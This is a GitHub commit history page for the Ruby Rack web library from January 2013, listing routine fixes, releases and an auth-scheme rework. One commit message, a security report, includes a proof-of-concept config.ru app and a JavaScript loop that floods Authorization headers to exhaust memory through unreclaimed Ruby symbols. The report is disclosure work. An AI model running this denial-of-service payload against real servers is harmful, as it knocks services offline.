Skip to content
This repository

Jan 28, 2013

  1. James Tucker

    Fix ChangeLog generation on 1.9.3+

    authored January 28, 2013
  2. James Tucker

    Bump version and add release notes to README

    authored January 28, 2013
  3. James Tucker

    Merge pull request #500 from aocole/patch-1

    Changing incorrect documentation
    authored January 28, 2013
  4. James Tucker

    Remove specific version code from Lint

     * Too easy to miss during updates
     * Required format unchanged
     * Closes #501
    authored January 28, 2013
  5. James Tucker

    Reimplement keys and values on SessionHash

     * Basic additional APIs to simplify requirements for Rails and Devise
    authored January 28, 2013

Jan 25, 2013

  1. Andrew Cole

    Changing incorrect documentation

    The original comment on set_session said to return true or false
    depending on whether the session was saved or not. In reality, this
    method MUST return the session id in order for #commit_session to set
    the cookie data properly.
    authored January 24, 2013

Jan 22, 2013

  1. James Tucker

    Merge branch 'lint-headerhash' of git://bogomips.org/rack

    * 'lint-headerhash' of git://bogomips.org/rack:
      lint: avoid TypeError on non-Hash-like response headers
    authored January 22, 2013
  2. Konstantin Haase

    Merge pull request #499 from barttenbrinke/master

    Added specific test when X-Forwarded-For is 'unknown'
    authored January 22, 2013
  3. Bart ten Brinke

    Added spec for new Squid behaviour.

    authored January 22, 2013
  4. lint: avoid TypeError on non-Hash-like response headers

    According to SPEC (and check_headers), Response headers need only
    respond to #each.  Thus, check_hijack_response should rely on
    Rack::Utils::HeaderHash if it wishes to access the headers in a
    hash-like fashion.
    authored January 22, 2013
  5. James Tucker

    Update gemspec version, Rack 1.5.0

    authored January 21, 2013
  6. James Tucker

    Update README for 1.5.0 release

    authored January 21, 2013
  7. James Tucker

    Switch to RFC 2822 expires

    authored January 21, 2013

Jan 21, 2013

  1. James Tucker

    Fix a long standing misnomer for date formats

    References #414
    authored January 21, 2013
  2. James Tucker

    Use Dir.tmpdir instead of hardcoded /tmp

    Closes #492
    authored January 21, 2013
  3. James Tucker

    Don't modify the middleware hash in Rack::Server

     * Closes #498
    authored January 21, 2013
  4. James Tucker

    Merge pull request #496 from homakov/patch-3

    Remove never called string
    authored January 21, 2013

Jan 14, 2013

  1. Egor Homakov

    Remove never called string

    Previous check `p.empty?` makes sure that p contains at least 1 symbol.
    After `.split('=', 2)` k or v or both will turn into some string which means `k || v` will always return true and `next` will never be called.
    authored January 14, 2013

Jan 13, 2013

  1. James Tucker

    Update to 1.5.0.beta.2

    authored January 13, 2013
  2. James Tucker

    Update README security notes

    authored January 13, 2013
  3. James Tucker

    Update README for release. Add security section.

    authored January 13, 2013
  4. James Tucker

    Rack::Auth::AbstractRequest#scheme returns strings

     * This is a breaking API change, but doesn't appear to be used in public
    authored January 13, 2013
  5. James Tucker

    Squash test warnings

    authored January 13, 2013
  6. James Tucker

    Turn warnings back on for basic test runs

    authored January 13, 2013
  7. James Tucker

    Squash warnings in spec_auth

    authored January 13, 2013
  8. James Tucker

    Reimplement auth scheme fix

     * Add Rack::Auth.add_scheme to enable folks to fix anything that breaks
     * Add common auth schemes, MS ones, AWS ones, etc are missing, as unlikely
     * Checked Rails - they don't use our authorization code
     * Checked Warden - uses rails
     * Checked Omniauth - uses rails
     * Checked doorkeeper - users rails
     * Checked rack-authentication - does it's own thing
     * Checked warden-oauth - doesn't do headers
     * Checked devise - uses rails
     * Checked oauth2-rack - header creation only
     * Checked rack-oauth2-server - does it's own thing
     * Probably missed a bunch, but that'll have to do
    authored January 13, 2013
  9. James Tucker

    Revert "Merge pull request #494 from homakov/patch-2"

    This reverts commit 9b76e4f, reversing
    changes made to bf32f4b.
    authored January 13, 2013
  10. Konstantin Haase

    Merge pull request #494 from homakov/patch-2

    Remove .to_sym in Authorization scheme
    authored January 13, 2013
  11. Egor Homakov

    Remove .to_sym in Authorization scheme

    Hello, `.to_sym` should never be applied on user input. Thus I recommend you to change `scheme` method:
    ```
      def scheme
        @scheme ||= parts.first.downcase.to_sym
      end
    ```
    While we can't send enourmous emount of `Authorization` headers we can make it as long as it's possible. 
    This is PoC. App:
    ```
    cat config.ru 
    require 'rack'
    run lambda{|e|
        auth =  Rack::Auth::Basic::Request.new(e)
        puts auth.basic? if auth.provided?
        puts Symbol.all_symbols.size
        [200, {'Content-Type'=>'text/html'},['IM FINE']]
    }
    ```
    Simple Javascript to DoS it:
    ```
    var base = ["aa", "ab", "ac", "ad", "ae", "af", "ag", "ah", "ai", "aj", "ak", "al", "am", "an", "ao", "ap", "aq", "ar", "as", "at", "au", "av", "aw", "ax", "ay", "az", "ba", "bb", "bc", "bd", "be", "bf", "bg", "bh", "bi", "bj", "bk", "bl", "bm", "bn", "bo", "bp", "bq", "br", "bs", "bt", "bu", "bv", "bw", "bx", "by", "bz", "ca", "cb", "cc", "cd", "ce", "cf", "cg", "ch", "ci", "cj", "ck", "cl", "cm", "cn", "co", "cp", "cq", "cr", "cs", "ct", "cu", "cv", "cw", "cx", "cy", "cz", "da", "db", "dc", "dd", "de", "df", "dg", "dh", "di", "dj", "dk", "dl", "dm", "dn", "do", "dp", "dq", "dr", "ds", "dt", "du", "dv", "dw", "dx", "dy", "dz", "ea", "eb", "ec", "ed", "ee", "ef", "eg", "eh", "ei", "ej", "ek", "el", "em", "en", "eo", "ep", "eq", "er", "es", "et", "eu", "ev", "ew", "ex", "ey", "ez", "fa", "fb", "fc", "fd", "fe", "ff", "fg", "fh", "fi", "fj", "fk", "fl", "fm", "fn", "fo", "fp", "fq", "fr", "fs", "ft", "fu", "fv", "fw", "fx", "fy", "fz", "ga", "gb", "gc", "gd", "ge", "gf", "gg", "gh", "gi", "gj", "gk", "gl", "gm", "gn", "go", "gp", "gq", "gr", "gs", "gt", "gu", "gv", "gw", "gx", "gy", "gz", "ha", "hb", "hc", "hd", "he", "hf", "hg", "hh", "hi", "hj", "hk", "hl", "hm", "hn", "ho", "hp", "hq", "hr", "hs", "ht", "hu", "hv", "hw", "hx", "hy", "hz", "ia", "ib", "ic", "id", "ie", "if", "ig", "ih", "ii", "ij", "ik", "il", "im", "in", "io", "ip", "iq", "ir", "is", "it", "iu", "iv", "iw", "ix", "iy", "iz", "ja", "jb", "jc", "jd", "je", "jf", "jg", "jh", "ji", "jj"];
    var total_sent = 0
    for(var num in base){
    	var x = new XMLHttpRequest;
    	x.open('GET','/'); 
    	str = '';
    	for(i=0;i<2000000;i++){
    	    str+='Ё'+base[num]+i;
    	}
    	x.setRequestHeader('Authorization',str+' lol')
    	x.send();
    	console.log('Total sent: ',total_sent+=str.length);
    }
    ```
    When we run JS every request carries 18888890 letters in a symbol. This 'data' will never be garbarge collectored.
    Should it be fixed?
    authored January 13, 2013

Jan 11, 2013

  1. James Tucker

    Merge branch 'hijack'

    * hijack:
      Hijack SPEC changes after review discussion
      Add straw man for the after-headers hijack
      Straw man for rack.hijack*, connection hijacking!
    authored January 11, 2013
  2. James Tucker

    Hijack SPEC changes after review discussion

    authored January 11, 2013
  3. James Tucker

    Add q-value helpers for Accept headers, etc.

     * Supersedes and closes #443
    authored January 11, 2013
  4. James Tucker

    Introduce Rack::Mime.match?, references #443

    authored January 11, 2013
  5. James Tucker

    Minor code review comments closing #451

     * Adds documentation
     * find is preferred over detect
     * Superseded body objects should be closed
    authored January 11, 2013
  6. James Tucker

    Revert "Set TMPDIR to fix Dir.mktmpdir under jRuby"

    This reverts commit 3b24fa9.
    authored January 11, 2013
Something went wrong with that request. Please try again.